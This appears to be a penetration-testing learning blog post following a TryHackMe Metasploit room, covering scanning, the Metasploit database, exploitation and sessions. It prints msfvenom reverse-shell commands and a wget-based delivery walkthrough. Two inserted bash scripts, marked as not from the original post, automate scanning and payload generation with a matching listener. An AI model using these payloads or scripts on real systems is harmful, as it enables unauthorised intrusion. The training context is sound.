Day 055 #FromZeroToHacker – Metasploit Exploitation

Today we are going to learn how to use Metasploit for vulnerability scanning and exploitation.

Let’s start our daily #FromZeroToHacker challenge.

Table of contents
Introduction
What have I learnt today?
Stats
Resources

Introduction to Metasploit Exploitation

Today we are going to learn how to use Metasploit for vulnerability scanning and exploitation.

We will also cover how the database feature makes it easier to manage penetration-testing engagements with a broad scope, and we will generate payloads with msfvenom to start a Meterpreter session on most target platforms.

What have I learnt today?

Scanning

Port scanning

We can list all the modules that scan open ports using the search portscan command.

Search portscan

We can load a module with use <NUMBER> (the index from the search results, as we saw in yesterday’s lesson) and have Metasploit list its options with show options:

Use show options

The module has seven options, but luckily most of them already have a sensible default; RHOSTS, the target host or range to scan, is the one we always have to set ourselves.

We can also run nmap from within msfconsole:

Metasploit nmap

UDP service identification

The scanner module scanner/discovery/udp_sweep lets you quickly identify services running over UDP (User Datagram Protocol). It does not probe every possible UDP service, but it is a fast way to spot common ones such as DNS or NetBIOS:

UDP Scan

SMB Scans

Metasploit also offers auxiliary modules that scan specific services, such as SMB (Server Message Block, the file- and printer-sharing protocol used by Windows and by Samba on Linux). Let’s see an example with scanner/smb/smb_version:

SMB Version

We should not skip less glamorous services such as NetBIOS (Network Basic Input Output System), which lets computers on the same network find each other and share files and printers. The NetBIOS name alone can reveal the role of a machine (DEV-OPS, SALES, CEO), and the shares behind it may be reachable without a password or protected by a trivial one (admin, administrator, 1234…).

Metasploit has many modules that can help us have a better understanding of the target system: It is always worth performing a quick search to see if we can find extra information.

The Metasploit Database

Metasploit has a database feature that simplifies project management and avoids confusion when setting parameter values across many targets. First, we need to start the PostgreSQL service with systemctl start postgresql. Then, we initialise the Metasploit database with msfdb init.

Then, launch msfconsole and check the database status with db_status:

Metasploit launch_db
Metasploit db_status

Now, we can create different workspaces to isolate different projects. Running workspace on its own lists them, with an asterisk marking the current one; on a fresh install that is default:

Metasploit Workspace

Add a new workspace with workspace -a <NAME> (which also switches to it) or delete an existing one with workspace -d <NAME>:

Workspace management

We can navigate between workspaces with workspace <WORKSPACE_NAME>:

Workspace navigation

You can use workspace -h to list all the options available:

Workspace help

Once the database is connected, results are stored in the current workspace. For example, db_nmap is a wrapper around nmap whose output is parsed straight into the database:

We can then query the recorded hosts and services with the hosts and services commands:

host services

Example workflow

  1. Load the vulnerability-scanning module that checks for MS17-010 (EternalBlue) with use auxiliary/scanner/smb/smb_ms17_010.
  2. Set RHOSTS from the hosts stored in the current workspace with hosts -R.
  3. Check that all values are assigned correctly with show options.
  4. Launch the scanner with run (exploit works as an alias for auxiliary modules too).
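The scanning and database steps above (db_nmap, udp_sweep, smb_version and the smb_ms17_010 workflow) can be chained in a msfconsole resource script so the whole sweep runs unattended and lands in one workspace. The script below is an added example, not from the original post or from Metasploit. It assumes the workspace name and target range are supplied on the command line and that msfdb init has already been run, and it uses services -p 445 -R instead of the hosts -R from the steps above so that the SMB checks are only sent to hosts where port 445 was actually seen open.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): generate and run a msfconsole
# resource script for the scan -> database -> MS17-010 check workflow.
# Assumptions: PostgreSQL is running and `msfdb init` has been done; the
# workspace name and target range come from the command line.

# Print the resource script for WORKSPACE and TARGETS to stdout.
# `workspace -a` creates the workspace and switches to it, so every result
# below is recorded there and not in "default".
build_scan_rc() {
    workspace="$1"
    targets="$2"
    cat <<EOF
workspace -a ${workspace}
db_nmap -sV -p 21,22,80,139,445,3389 ${targets}
use auxiliary/scanner/discovery/udp_sweep
set RHOSTS ${targets}
run
use auxiliary/scanner/smb/smb_version
services -p 445 -R
run
use auxiliary/scanner/smb/smb_ms17_010
services -p 445 -R
run
hosts
services
vulns
exit
EOF
}

# Write the script to OUTFILE; fails if nothing was written.
write_scan_rc() {
    build_scan_rc "$1" "$2" > "$3" && [ -s "$3" ]
}

# Feed the script to msfconsole (needs Metasploit and a running database).
run_scan() {
    rc="$(mktemp)" || return 1
    write_scan_rc "$1" "$2" "$rc" || return 1
    msfconsole -q -r "$rc"
    rm -f "$rc"
}

case "${1:-}" in
    --run) run_scan "$2" "$3" ;;
    *) echo "usage: $0 --run <workspace> <targets, e.g. 10.10.10.0/24>" >&2 ;;
esac
```

Run it as ./scan.sh --run lab 10.10.10.0/24; afterwards hosts, services and vulns in that workspace hold everything the sweep found, and a later session can pick up where this one stopped with workspace lab.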

You may want to look for classic vulnerabilities in:

  • HTTP: Could host a web application where you can find SQL injection or RCE vulnerabilities.
  • FTP: Could allow anonymous login.
  • SMB: It may be vulnerable to SMB exploits like MS17-010.
  • SSH: Could have default or easy-to-guess credentials.
  • RDP: It may be vulnerable to BlueKeep (CVE-2019-0708) or allow desktop access if weak credentials are used.

Vulnerability scanning

Metasploit lets you quickly identify critical vulnerabilities that are easy to find and exploit (low-hanging fruit). For example, if we identify a VNC service, we can run search vnc in msfconsole to list the relevant modules.

We can use info in any module to have more information about how it works, how to use it, its purpose, etc:

Metasploit module info

Exploitation

Exploits are the most populated module category, which is no surprise given that Metasploit is an exploitation framework.

We have used search to search for exploits, info to dump more info about the exploit, and finally, we launched it with exploit or run.

This process seems simple, but a successful outcome depends on a great understanding of the services running on the target system.

Most exploits come with a default payload already selected, and show payloads lists every payload compatible with the chosen exploit:

Module Show payloads

Once we have decided on the payload, we can select it with set payload <NUMBER>:

Set payload

Remember that finding a working payload can become a trial-and-error process due to firewalls, anti-virus, configurations, etc.

Some payloads will open new parameters that we need to set; running show options will display them.

Let’s run the exploit. A successful run opens a session, which we can send to the background with CTRL+Z (or abort with CTRL+C); running exploit -z instead opens the session already backgrounded.

Backgrounding a session will be useful when working on more than one target at the same time, or using the same target but with a different exploit.

Backgrounding a session

Working with sessions

The sessions command lists all the active sessions (like the one we just backgrounded), and sessions -i <NUMBER> brings the selected session back to the foreground.

Sessions listing and selecting

Msfvenom

Msfvenom, which replaced Msfpayload and Msfencode, generates payloads in many different formats (.php, .exe, .dll, .elf, etc.) and for many different target systems (Linux, Windows, Android, etc.).

MSfvenom

Output formats

msfvenom can produce either stand-alone payloads (an .exe or .elf that carries Meterpreter on its own) or raw payload code to embed in something else (python, php…). msfvenom --list formats lists the supported output formats, and msfvenom --list payloads the available payloads.

Msfvenom list commands

Encoders

As the name says, an encoder transforms the payload bytes; the original purpose is to avoid bad characters (null bytes, newlines) that would break the exploit buffer. Contrary to a common belief, encoding is not an antivirus-evasion technique: the standard encoders are well known to AV engines, and there are better options for that.

Handlers

When we use an exploit module, Metasploit starts a handler for the reverse connection automatically. A payload generated with msfvenom, however, is delivered outside of an exploit module, so we have to start a handler ourselves to catch the reverse shell or Meterpreter callback.

Imagine that we want to exploit a file upload vulnerability present in DVWA (Damn Vulnerable Web Application). The exploit steps are:

  1. Generate the PHP shell using Msfvenom.
  2. Start the Metasploit handler.
  3. Execute the PHP shell.

Msfvenom requires a payload, the local machine IP address, and the local port that will be used as a listener:

PHP reverse shell

Warning: the generated PHP file may be missing the opening <?php tag. Check its first line and edit the file so that it is valid PHP before uploading it.

Starting PHP
Ending PHP

With the reverse shell code created, we can use Multi Handler to receive the incoming connection with use exploit/multi/handler, setting the same payload, LHOST and LPORT that we passed to msfvenom.

Multi handler options

Now, we just need to run the handler and wait for the incoming connection.

Other payloads

Depending on the target configuration (OS, webserver, etc) msfvenom can be used to create payloads in almost all formats.

In all these examples, LHOST is our attacking machine’s IP (the address the payload connects back to), and LPORT is the port where our handler will listen.

Linux Executable and Linkable Format (.elf)

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f elf > <FILENAME>.elf
The .elf format is the native Linux executable format. Remember to give the file execute permission with chmod +x <FILENAME>.elf, then run it with ./<FILENAME>.elf.

Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f exe > rev_shell.exe

PHP
msfvenom -p php/meterpreter_reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f raw > <FILENAME>.php

ASP
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f asp > <FILENAME>.asp

Python
msfvenom -p cmd/unix/reverse_python LHOST=<LOCAL_IP> LPORT=<LOCAL_PORT> -f raw > <FILENAME>.py

All of these examples are reverse payloads, so exploit/multi/handler must be listening on our attacking machine before the payload runs, configured with the same payload, LHOST and LPORT parameters.

This is an example of an attack using msfvenom:

First, we create a Meterpreter payload in the .elf format and make it executable (the permission bit will not survive the HTTP download, so we will have to repeat this on the target):

Msfvenom step 1

Then, we start a Python web server to serve the file to the target computer once we are inside:

Msfvenom step 2

Then, we log in to the target over SSH:

Msfvenom step 3

Once inside, from a directory we are allowed to write to, we download the file with wget:

Msfvenom step 4

With the file transferred, we can stop the python3 server. Back on the attacking machine, start msfconsole, load exploit/multi/handler, set the same payload, LHOST and LPORT values we used when creating the payload in the first step, and run it to start the listener (it must be listening before the payload is executed):

Msfvenom step 5

Now make the downloaded .elf executable again with chmod +x, run it, and the handler in msfconsole will open a Meterpreter session: the attack was successful 🙂

Msfvenom step 6
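The most common failure in this procedure is a mismatch between the payload msfvenom built and the one the handler expects: a staged windows/meterpreter/reverse_tcp will not complete a session on a handler configured for the stageless windows/meterpreter_reverse_tcp, and vice versa. The script below is an added example, not from the original post or from Metasploit, that derives both sides from the same payload/LHOST/LPORT triple. It picks the payload and output format from the table in the previous section, prints the msfvenom command, writes a matching exploit/multi/handler resource file, prepends the opening <?php tag when a raw PHP payload lacks it (the warning from the DVWA section), and prints the python3 -m http.server / wget lines used in the walkthrough above. The short target names (linux, windows, php, asp, python), the shell.<ext> and handler.rc file names, and port 8000 for the web server are my assumptions.

```shell
#!/usr/bin/env bash
# Added example (not from the original post or from Metasploit): derive the
# msfvenom command and the matching exploit/multi/handler configuration from
# the same payload/LHOST/LPORT triple so they cannot drift apart.
# Assumptions: msfvenom and msfconsole are on PATH only when --gen/--listen
# are used; the helper functions themselves do not need Metasploit.

# Map a short target name to "payload format extension", mirroring the
# table in the post. Staged (meterpreter/reverse_tcp) and stageless
# (meterpreter_reverse_tcp) payloads are different; the handler must use
# exactly the one that was generated.
payload_spec() {
    case "$1" in
        linux)   echo "linux/x86/meterpreter/reverse_tcp elf elf" ;;
        windows) echo "windows/meterpreter/reverse_tcp exe exe" ;;
        php)     echo "php/meterpreter_reverse_tcp raw php" ;;
        asp)     echo "windows/meterpreter/reverse_tcp asp asp" ;;
        python)  echo "cmd/unix/reverse_python raw py" ;;
        *)       echo "unknown target: $1" >&2; return 1 ;;
    esac
}

# The msfvenom command line for TARGET LHOST LPORT, printed so it can be
# reviewed (or pasted) before anything is generated.
msfvenom_cmd() {
    spec="$(payload_spec "$1")" || return 1
    payload="${spec%% *}"; rest="${spec#* }"
    fmt="${rest%% *}"; ext="${rest#* }"
    printf 'msfvenom -p %s LHOST=%s LPORT=%s -f %s -o shell.%s\n' \
        "$payload" "$2" "$3" "$fmt" "$ext"
}

# Resource script for the handler that matches a generated payload.
# ExitOnSession false + exploit -j keeps the listener up for more callbacks.
handler_rc() {
    cat <<EOF
use exploit/multi/handler
set PAYLOAD $1
set LHOST $2
set LPORT $3
set ExitOnSession false
exploit -j
EOF
}

# Raw PHP output from msfvenom may lack the opening tag (see the warning in
# the DVWA section): prepend it if the first line has none. Safe to rerun.
ensure_php_open_tag() {
    if ! head -n 1 "$1" | grep -q '<?php'; then
        tmp="$(mktemp)" || return 1
        { printf '<?php\n'; cat "$1"; } > "$tmp" && mv "$tmp" "$1"
    fi
}

# Generate the payload, fix it up, write handler.rc, and print the
# delivery steps from the walkthrough (assumed port 8000 for the web server).
gen_payload() {
    spec="$(payload_spec "$1")" || return 1
    payload="${spec%% *}"; rest="${spec#* }"
    fmt="${rest%% *}"; ext="${rest#* }"
    out="shell.${ext}"
    msfvenom -p "$payload" LHOST="$2" LPORT="$3" -f "$fmt" -o "$out" || return 1
    if [ "$ext" = php ]; then ensure_php_open_tag "$out"; fi
    handler_rc "$payload" "$2" "$3" > handler.rc
    echo "payload: ${out}   handler config: handler.rc"
    echo "listen:  msfconsole -q -r handler.rc      # start this first"
    echo "serve:   python3 -m http.server 8000      # from this directory"
    echo "fetch:   wget http://$2:8000/${out} -O /tmp/${out}"
    if [ "$ext" = elf ]; then echo "run:     chmod +x /tmp/${out} && /tmp/${out}"; fi
}

case "${1:-}" in
    --gen)    gen_payload "$2" "$3" "$4" ;;
    --listen) msfconsole -q -r handler.rc ;;
    *) echo "usage: $0 --gen <linux|windows|php|asp|python> <LHOST> <LPORT> | --listen" >&2 ;;
esac
```

Use ./payload.sh --gen linux 10.0.0.5 4444 on the attacking machine, then ./payload.sh --listen in a second terminal before the target fetches and runs the file. PHP does not require a closing ?> tag, so only the opening tag is checked; for an .exe or .asp nothing is patched, the payload name in handler.rc is simply guaranteed to be the one msfvenom was given.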

Summary

Things we learned today:

  • How to scan target systems using Metasploit.
  • How to use the Metasploit database feature.
  • How to use Metasploit to conduct a vulnerability scan.
  • How to use Metasploit to exploit vulnerable services on target systems.
  • How msfvenom can be used to create payloads and obtain a Meterpreter session on the target system.

Stats

From 77,283rd to 76,355th.

Here is also the Skill Matrix:

Skills Matrix

Resources

Path: Jr Penetration tester

Metasploit

TryHackMe: Metasploit Exploitation

Other resources

Metasploit: Introduction
SQL Injection attacks
What the Shell? Part 2